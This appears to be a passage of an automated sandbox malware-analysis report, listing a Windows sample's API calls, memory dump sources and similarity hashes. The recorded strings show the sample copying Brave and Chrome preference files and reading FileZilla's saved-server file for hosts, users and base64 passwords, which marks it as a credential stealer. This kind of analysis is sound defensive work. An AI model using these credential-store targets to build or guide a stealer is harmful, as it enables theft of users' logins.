                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDC8F
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FBDCD0
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FBDCF0
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FBDD0A
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FBDD1D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDD7B
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDDA3
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDDAF
                                  • lstrlen.KERNEL32(?), ref: 00FBDDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FBDDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDE19
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBDE6F
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDE7B
                                  • lstrlen.KERNEL32(01B99078), ref: 00FBDE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDEBB
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBDEE6
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDEF2
                                  • lstrlen.KERNEL32(01B991E8), ref: 00FBDF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDFA5
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBDFB1
                                  • lstrlen.KERNEL32(01B99078), ref: 00FBDFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDFF4
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FBDFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE022
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FBE02E
                                  • lstrlen.KERNEL32(01B991E8), ref: 00FBE03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBE06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 00FBE0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 00FBE0E7
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE11F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FBE12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE155
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FBE15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE19F
                                  • lstrcat.KERNEL32(00000000), ref: 00FBE1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FBE1F9
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE22F
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FBE23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE261
                                  • lstrcat.KERNEL32(00000000,01B991C8), ref: 00FBE269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 00FBE274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00FBE2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE349
                                  • DeleteFileA.KERNEL32(?), ref: 00FBE381
                                  • StrCmpCA.SHLWAPI(?,01B9D610), ref: 00FBE3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE445
                                  • StrCmpCA.SHLWAPI(?,01B991E8), ref: 00FBE468
                                  • StrCmpCA.SHLWAPI(?,01B99078), ref: 00FBE47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00FBE4E0
                                  • StrCmpCA.SHLWAPI(?,01B9D550), ref: 00FBE58E
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBE5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00FBE639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00FBE776
                                  • DeleteFileA.KERNEL32(?), ref: 00FBE7D2
                                  • StrCmpCA.SHLWAPI(?,01B991B8), ref: 00FBE7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBE916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FBE952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: b95e1fab92a5661c7a8d5d9561071bd0be85bb322a3421a036d9dc9e7105e086
                                  • Instruction ID: 30d2ca1591ffb5d95ea6fa94de6740eff6f2d6043fcab4137939d36e6700e2c1
                                  • Opcode Fuzzy Hash: b95e1fab92a5661c7a8d5d9561071bd0be85bb322a3421a036d9dc9e7105e086
                                  • Instruction Fuzzy Hash: 5892A071D102099BDB64EFB6DC89AEE7BB9AF44310F044528F816AB244DB38DC45EF91
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC18D2
                                  • lstrlen.KERNEL32(\*.*), ref: 00FC18DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC18FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 00FC190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FC1947
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FC1967
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FC1981
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC19BF
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC19F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC1A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1A4C
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1A80
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1AB4
                                  • lstrlen.KERNEL32(?), ref: 00FC1AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC1AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1B19
                                  • lstrlen.KERNEL32(01B99298), ref: 00FC1B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1B8F
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1BC3
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1C57
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1C8B
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1D21
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1D55
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC1DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1DED
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1E36
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1E68
                                  • lstrlen.KERNEL32(01B9D538), ref: 00FC1E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1EB2
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1EE3
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1F15
                                  • lstrlen.KERNEL32(01B9D750), ref: 00FC1F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1F5F
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC1F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1F90
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC1F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC1FC2
                                  • lstrlen.KERNEL32(01B8B748), ref: 00FC1FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2036
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC2048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2067
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC2073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2098
                                  • lstrlen.KERNEL32(?), ref: 00FC20AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC20D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC20DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2103
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC213F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FC214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC2176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC2181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: ed0720c655c8e1ad640433a18fa9adf7fb2fe6871ebebafe4ee7cd3f5af6b3af
                                  • Instruction ID: 487d6cf5331449a2fbdf243cbfb6a17cd7204368a5ab28fe9e44f16a50369d6b
                                  • Opcode Fuzzy Hash: ed0720c655c8e1ad640433a18fa9adf7fb2fe6871ebebafe4ee7cd3f5af6b3af
                                  • Instruction Fuzzy Hash: B462A03091161B9BDB61EFA5CD8AFEEB7B9BF41710F040128B815A7245DB38DD41EBA0
                                  APIs
                                  • wsprintfA.USER32 ref: 00FC392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00FC3943
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FC396C
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FC3986
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC39BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC39E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC39F2
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC39FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3A1A
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3A26
                                  • lstrlen.KERNEL32(?), ref: 00FC3A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC3A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3A8A
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC3ACE
                                  • lstrlen.KERNEL32(?), ref: 00FC3AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3B36
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3B6A
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3B9E
                                  • lstrlen.KERNEL32(?), ref: 00FC3BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC3BE0
                                  • lstrlen.KERNEL32(01B991C8), ref: 00FC3C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3C3C
                                  • lstrlen.KERNEL32(01B99298), ref: 00FC3C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3CB7
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3CE8
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC3D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3D79
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3DAD
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3E43
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3E77
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC3EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3F0D
                                  • lstrlen.KERNEL32(00FE1794), ref: 00FC3F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3F41
                                  • lstrcat.KERNEL32(00000000,00FE1794), ref: 00FC3F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3F75
                                  • lstrlen.KERNEL32(?), ref: 00FC3F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 00FC3FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC3FE0
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC401F
                                  • lstrlen.KERNEL32(01B9D580), ref: 00FC402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC4056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC4061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC40CE
                                  • lstrcat.KERNEL32(00000000), ref: 00FC40DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 00FC42D9
                                  • FindClose.KERNEL32(00000000), ref: 00FC42E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: cd6701b092cd5e9b084d830e5002e7b72902f53212d2fde0d91d1ee9c32abfbe
                                  • Instruction ID: c456191dcf1393dd1840f7f93cc98e492eb57c752db9bf6ff1a8ca54cc2afab4
                                  • Opcode Fuzzy Hash: cd6701b092cd5e9b084d830e5002e7b72902f53212d2fde0d91d1ee9c32abfbe
                                  • Instruction Fuzzy Hash: E5629F31D1061B9BCB25EFA5CD4AFEE77B9AF40354F048128B815A7244DB38EE45EB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00FC69C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FC6A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00FC6A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00FC6AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FC6B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00FC6B35
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6B9D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FC6BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: b877f8c00b110cd5ba22908b112ac1d0291fdb39512168ce7909002ab5362d06
                                  • Instruction ID: d5a723465c22168b06673eb18813b0b64432ad0175b5d7d49f7845dbef52d915
                                  • Opcode Fuzzy Hash: b877f8c00b110cd5ba22908b112ac1d0291fdb39512168ce7909002ab5362d06
                                  • Instruction Fuzzy Hash: 3C429130E04206ABDB25EBF1DD8AFAE7BB9AF44714F044428F515EB241DB38D941EB61
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00FBDBEF
                                  • lstrlen.KERNEL32(00FE4CA8), ref: 00FBDBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDC17
                                  • lstrcat.KERNEL32(00000000,00FE4CA8), ref: 00FBDC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FBDC4C
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDC8F
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00FBDCD0
                                  • StrCmpCA.SHLWAPI(?,00FE17A0), ref: 00FBDCF0
                                  • StrCmpCA.SHLWAPI(?,00FE17A4), ref: 00FBDD0A
                                  • lstrlen.KERNEL32(00FDCFEC), ref: 00FBDD1D
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FBDD47
